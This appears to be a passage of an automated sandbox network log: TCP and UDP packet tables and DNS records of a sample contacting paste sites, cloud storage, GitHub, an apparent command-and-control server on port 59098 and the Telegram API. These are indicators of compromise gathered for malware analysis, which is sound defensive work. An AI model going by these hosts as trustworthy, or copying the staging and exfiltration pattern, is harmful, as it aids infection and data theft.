Jan 8, 2025 10:15:55.954978943 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.954993963 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955038071 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955044985 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955071926 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955090046 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955339909 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955355883 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955401897 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955410004 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955450058 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955761909 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955781937 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955805063 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955811024 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.955842972 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.955861092 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.956299067 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.956314087 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.956356049 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:55.956363916 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:55.956406116 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.039881945 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.039899111 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.039968967 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.039983988 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.040009022 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.040030956 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.040323973 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.040340900 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.040384054 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.040391922 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.040416002 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.040435076 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.040941954 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.040956974 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041003942 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.041012049 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041049004 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.041425943 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041440964 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041480064 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.041486979 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041512012 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.041528940 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.041944981 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.041959047 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042005062 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042012930 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042063951 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042357922 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042371035 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042408943 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042416096 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042439938 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042459011 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042838097 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042865038 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042913914 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.042923927 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.042960882 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.098979950 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.098998070 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.099076986 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.099090099 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.099143982 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.126722097 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.126738071 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.126811981 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.126821041 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.126854897 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.126879930 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.127177000 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127192020 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127244949 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.127252102 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127293110 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.127685070 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127698898 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127753973 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.127762079 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.127825022 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.128355980 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128370047 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128408909 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.128458023 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.128463030 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128519058 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.128689051 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128705025 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128756046 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.128762960 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.128809929 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.129205942 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129220963 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129277945 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.129283905 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129326105 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.129731894 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129745960 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129793882 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.129802942 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.129823923 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.129844904 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.185894966 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.185913086 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.185996056 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.186003923 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.186163902 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.213571072 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.213638067 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.213645935 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.213660002 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.213670015 CET	443	49963	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:56.213690996 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.213720083 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:56.218414068 CET	49963	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:58.197367907 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.197415113 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:58.197485924 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.198365927 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.198379993 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:58.680600882 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:58.680717945 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.682207108 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.682214975 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:58.682470083 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:58.683767080 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:58.727343082 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:59.110706091 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:59.110910892 CET	443	50000	185.199.110.133	192.168.2.7
Jan 8, 2025 10:15:59.112195969 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:15:59.112586021 CET	50000	443	192.168.2.7	185.199.110.133
Jan 8, 2025 10:16:01.685141087 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:01.685169935 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:01.685264111 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:01.685476065 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:01.685492039 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.166997910 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.167974949 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.167999029 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.168144941 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.168149948 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.169184923 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.169243097 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.170272112 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.170331001 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.170425892 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.211340904 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.261693954 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.261709929 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.418656111 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:02.727188110 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.728530884 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:02.728607893 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:03.410821915 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:03.416114092 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:03.416223049 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:03.670314074 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:03.675182104 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:06.199218035 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:06.205013037 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:14.512182951 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:14.517009020 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:21.790283918 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:21.795084000 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:24.773880959 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:24.773943901 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:28.649461985 CET	50008	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:28.654334068 CET	59098	50008	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:28.659333944 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:28.664145947 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:28.664279938 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:28.810311079 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:28.815126896 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:31.399451017 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:31.404340029 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:32.770127058 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:32.770154953 CET	443	50005	107.180.236.211	192.168.2.7
Jan 8, 2025 10:16:42.755388021 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:42.760217905 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:43.774461985 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:43.779301882 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:49.014385939 CET	50005	443	192.168.2.7	107.180.236.211
Jan 8, 2025 10:16:49.040097952 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:49.044991016 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:49.784668922 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:49.784687042 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:49.784936905 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:49.785583019 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:49.785592079 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:49.843408108 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:49.848140955 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:50.045615911 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:50.045706034 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:50.321662903 CET	50009	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:50.326766014 CET	59098	50009	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:50.328682899 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:50.333580971 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:50.333726883 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:50.373456955 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:50.378268957 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:50.403868914 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:50.403954983 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:50.406233072 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:50.406240940 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:50.406485081 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:50.407536030 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:50.455337048 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:50.455461025 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:50.455468893 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:51.194418907 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:51.194500923 CET	443	50010	149.154.167.220	192.168.2.7
Jan 8, 2025 10:16:51.194557905 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:51.195581913 CET	50010	443	192.168.2.7	149.154.167.220
Jan 8, 2025 10:16:52.337016106 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:52.341828108 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:16:57.698241949 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:16:57.703161001 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:02.477639914 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:02.482475042 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:04.891496897 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:04.896337032 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:04.913347960 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:04.918075085 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:05.141988993 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:05.146796942 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:05.240046978 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:05.245215893 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:05.645667076 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:05.650587082 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:06.775964022 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:06.780740976 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:06.818428993 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:06.823303938 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:07.309772968 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:07.314759016 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:09.933393955 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:09.938277006 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:09.998912096 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:10.003740072 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:10.383255005 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:10.388084888 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:11.729799986 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:11.729857922 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.337073088 CET	50011	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.341835022 CET	59098	50011	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:12.346462011 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.351308107 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:12.351397038 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.377219915 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.382035971 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:12.509305954 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:12.514112949 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:13.838494062 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:13.843386889 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:13.876054049 CET	50012	59098	192.168.2.7	147.185.221.24
Jan 8, 2025 10:17:13.880861998 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:33.733155966 CET	59098	50012	147.185.221.24	192.168.2.7
Jan 8, 2025 10:17:33.733274937 CET	50012	59098	192.168.2.7	147.185.221.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 10:15:03.756145000 CET	62564	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:03.769598007 CET	53	62564	1.1.1.1	192.168.2.7
Jan 8, 2025 10:15:05.369076014 CET	56019	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:05.379281998 CET	53	56019	1.1.1.1	192.168.2.7
Jan 8, 2025 10:15:07.232116938 CET	49532	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:07.270674944 CET	53	49532	1.1.1.1	192.168.2.7
Jan 8, 2025 10:15:23.877229929 CET	50568	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:23.884370089 CET	53	50568	1.1.1.1	192.168.2.7
Jan 8, 2025 10:15:32.761487961 CET	57987	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:32.768035889 CET	53	57987	1.1.1.1	192.168.2.7
Jan 8, 2025 10:15:33.825856924 CET	51228	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:15:33.832707882 CET	53	51228	1.1.1.1	192.168.2.7
Jan 8, 2025 10:16:01.584059954 CET	50329	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:16:01.684125900 CET	53	50329	1.1.1.1	192.168.2.7
Jan 8, 2025 10:16:49.776341915 CET	53227	53	192.168.2.7	1.1.1.1
Jan 8, 2025 10:16:49.783122063 CET	53	53227	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 10:15:03.756145000 CET	192.168.2.7	1.1.1.1	0x36ec	Standard query (0)	anonsharing.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:05.369076014 CET	192.168.2.7	1.1.1.1	0x5d44	Standard query (0)	s3.ca-central-1.wasabisys.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:07.232116938 CET	192.168.2.7	1.1.1.1	0xd823	Standard query (0)	pastejustit.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:23.877229929 CET	192.168.2.7	1.1.1.1	0xb4de	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:32.761487961 CET	192.168.2.7	1.1.1.1	0xc424	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:33.825856924 CET	192.168.2.7	1.1.1.1	0x1ea2	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:16:01.584059954 CET	192.168.2.7	1.1.1.1	0x4b1	Standard query (0)	sigma.dreamhosters.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:16:49.776341915 CET	192.168.2.7	1.1.1.1	0x630a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:03.769598007 CET	1.1.1.1	192.168.2.7	0x36ec	No error (0)	anonsharing.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:05.379281998 CET	1.1.1.1	192.168.2.7	0x5d44	No error (0)	s3.ca-central-1.wasabisys.com	ca-central-1.wasabisys.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 10:15:05.379281998 CET	1.1.1.1	192.168.2.7	0x5d44	No error (0)	ca-central-1.wasabisys.com		38.143.146.102	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:05.379281998 CET	1.1.1.1	192.168.2.7	0x5d44	No error (0)	ca-central-1.wasabisys.com		38.143.146.101	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:05.379281998 CET	1.1.1.1	192.168.2.7	0x5d44	No error (0)	ca-central-1.wasabisys.com		38.143.146.100	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:05.379281998 CET	1.1.1.1	192.168.2.7	0x5d44	No error (0)	ca-central-1.wasabisys.com		38.143.146.103	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:07.270674944 CET	1.1.1.1	192.168.2.7	0xd823	No error (0)	pastejustit.com		178.159.12.230	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:23.884370089 CET	1.1.1.1	192.168.2.7	0xb4de	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:23.884370089 CET	1.1.1.1	192.168.2.7	0xb4de	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:23.884370089 CET	1.1.1.1	192.168.2.7	0xb4de	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:23.884370089 CET	1.1.1.1	192.168.2.7	0xb4de	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:32.768035889 CET	1.1.1.1	192.168.2.7	0xc424	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:33.832707882 CET	1.1.1.1	192.168.2.7	0x1ea2	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:33.832707882 CET	1.1.1.1	192.168.2.7	0x1ea2	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:33.832707882 CET	1.1.1.1	192.168.2.7	0x1ea2	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:15:33.832707882 CET	1.1.1.1	192.168.2.7	0x1ea2	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
